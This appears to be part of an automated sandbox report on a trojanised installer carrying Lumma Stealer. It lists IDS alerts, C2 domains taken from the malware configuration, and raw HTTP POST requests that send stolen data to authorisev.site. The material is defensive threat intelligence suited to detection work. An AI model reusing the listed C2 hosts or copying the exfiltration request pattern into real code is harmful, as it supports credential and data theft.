Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	36_2_0042F4DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [ebx], al	36_2_0042F4DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ebx, eax	36_2_0040D500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [ebx], ax	36_2_0041F510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [esi], cl	36_2_0041F510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-67BC38F0h]	36_2_00441648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	36_2_0043C6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], cx	36_2_0041C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+52B71DE2h]	36_2_00441720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then xor byte ptr [ecx+ebx], bl	36_2_00443720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx-09A22FB6h]	36_2_0043F7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	36_2_0042E870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+ebx]	36_2_00405820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], cx	36_2_0041C8CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, eax	36_2_0040E8D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+esi]	36_2_0040C960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, eax	36_2_0040E996
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp eax	36_2_0042AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1817620Ch]	36_2_0042AA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], cx	36_2_0042CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], cx	36_2_0042CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2BB126CDh]	36_2_0043FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edi, edx	36_2_00421B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp al, 2Eh	36_2_0042AC04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edi, esi	36_2_0041ECDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	36_2_00437CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	36_2_0042DE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [esp+3Ch], 595A5B84h	36_2_00440E3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edi, dword ptr [esp+54h]	36_2_0042CEDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp edx	36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then xor byte ptr [ecx+ebx], bl	36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	36_2_00425F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, word ptr [edx]	36_2_00428F00

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2057071 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (authorisev .site) : 192.168.2.4:51868 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49743 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49755 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49777 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49749 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49741 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49766 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49739 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49793 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49766 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49741 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49793 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49777 -> 104.21.85.194:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: goalyfeastz.site
Source: Malware configuration extractor	URLs: dilemmadu.site
Source: Malware configuration extractor	URLs: seallysl.site
Source: Malware configuration extractor	URLs: authorisev.site
Source: Malware configuration extractor	URLs: contemteny.site
Source: Malware configuration extractor	URLs: faulteyotk.site
Source: Malware configuration extractor	URLs: opposezmny.site
Source: Malware configuration extractor	URLs: servicedny.site

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49777 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49766 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.85.194:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49793 -> 104.21.85.194:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: authorisev.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: authorisev.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: authorisev.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: authorisev.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: authorisev.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1233Host: authorisev.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 563570Host: authorisev.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: authorisev.site

Source: unknown	TCP traffic detected without corresponding DNS query: 95.101.111.144
Source: unknown	TCP traffic detected without corresponding DNS query: 95.101.111.137
Source: unknown	TCP traffic detected without corresponding DNS query: 95.101.111.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.101.111.144
Source: unknown	TCP traffic detected without corresponding DNS query: 95.101.111.137
Source: unknown	TCP traffic detected without corresponding DNS query: 95.101.111.168
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B9D935 InternetReadFile,SetEvent,GetLastError,SetEvent,

35_2_00B9D935

Source: global traffic

DNS traffic detected: DNS query: authorisev.site

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: authorisev.site

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 01 Nov 2024 09:50:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IjjQOQjUQOVK4cOVh2WZh0ToapHd4SyCVl2Tn8KkiQQ96CptCjAlAN7gf5OYvVe4t8qwZbXNwBrVj6rzo5QibK4DyKcXEonuXjIKHOINsGdQT9Ymj2SzkCECE%2F41MpMHtSg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dbafbc149e26c1c-DFW

Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe	String found in binary or memory: http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
Source: file.exe	String found in binary or memory: http://ccsca2021.ocsp-certum.com05
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: file.exe	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: file.exe	String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: is-7LJOT.tmp.3.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: is-7LJOT.tmp.3.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: is-7LJOT.tmp.3.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: is-7LJOT.tmp.3.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cscasha2.ocsp-ce
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.us
Source: is-7LJOT.tmp.3.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: is-7LJOT.tmp.3.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: is-7LJOT.tmp.3.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.certum
Source: file.exe	String found in binary or memory: http://repository.certum.pl/ccsca2021.cer0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: file.exe	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: file.exe	String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
Source: is-7LJOT.tmp.3.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: is-7LJOT.tmp.3.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	String found in binary or memory: http://subca.ocsp-certum.com01
Source: file.exe	String found in binary or memory: http://subca.ocsp-certum.com02
Source: file.exe	String found in binary or memory: http://subca.ocsp-certum.com05
Source: file.exe	String found in binary or memory: http://vovsoft.com
Source: file.exe	String found in binary or memory: http://vovsoft.com/
Source: file.exe	String found in binary or memory: http://vovsoft.com/blog/how-to-activate-using-license-key/openU
Source: file.exe	String found in binary or memory: http://vovsoft.com/blog/how-to-uninstall-vovsoft-software/openU
Source: file.exe	String found in binary or memory: http://vovsoft.com/help/
Source: file.exe	String found in binary or memory: http://vovsoft.com/openU
Source: file.exe	String found in binary or memory: http://vovsoft.comopenS
Source: file.exe	String found in binary or memory: http://vovsoft.comopenU
Source: Updater.exe, 0000001C.00000000.1715511029.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmp, is-7LJOT.tmp.3.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	String found in binary or memory: http://www.certum.pl/CPS0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: file.exe	String found in binary or memory: http://www.indyproject.org/
Source: MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authorisev.site/
Source: MSBuild.exe, 00000024.00000002.2348303261.00000000012F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authorisev.site//
Source: MSBuild.exe, 00000024.00000002.2348303261.00000000012DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authorisev.site/0
Source: MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authorisev.site/2U
Source: MSBuild.exe, 00000024.00000002.2348303261.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authorisev.site/api
Source: MSBuild.exe, 00000024.00000002.2348303261.00000000012F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authorisev.site/mOW
Source: MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000024.00000002.2348303261.00000000012F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authorisev.site/pi
Source: MSBuild.exe, 00000024.00000002.2348303261.000000000124D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authorisev.site:443/api
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	String found in binary or memory: https://jrsoftware.org/
Source: file.exe	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	String found in binary or memory: https://jrsoftware.org0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: file.exe	String found in binary or memory: https://vovsoft.com/blog/credits-and-acknowledgements/open
Source: file.exe	String found in binary or memory: https://vovsoft.com/translation/
Source: file.exe	String found in binary or memory: https://vovsoft.com/translation/openU
Source: is-7LJOT.tmp.3.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	String found in binary or memory: https://www.certum.pl/CPS0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: is-7LJOT.tmp.3.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: is-7LJOT.tmp.3.dr	String found in binary or memory: https://www.globalsign.com/repository/06
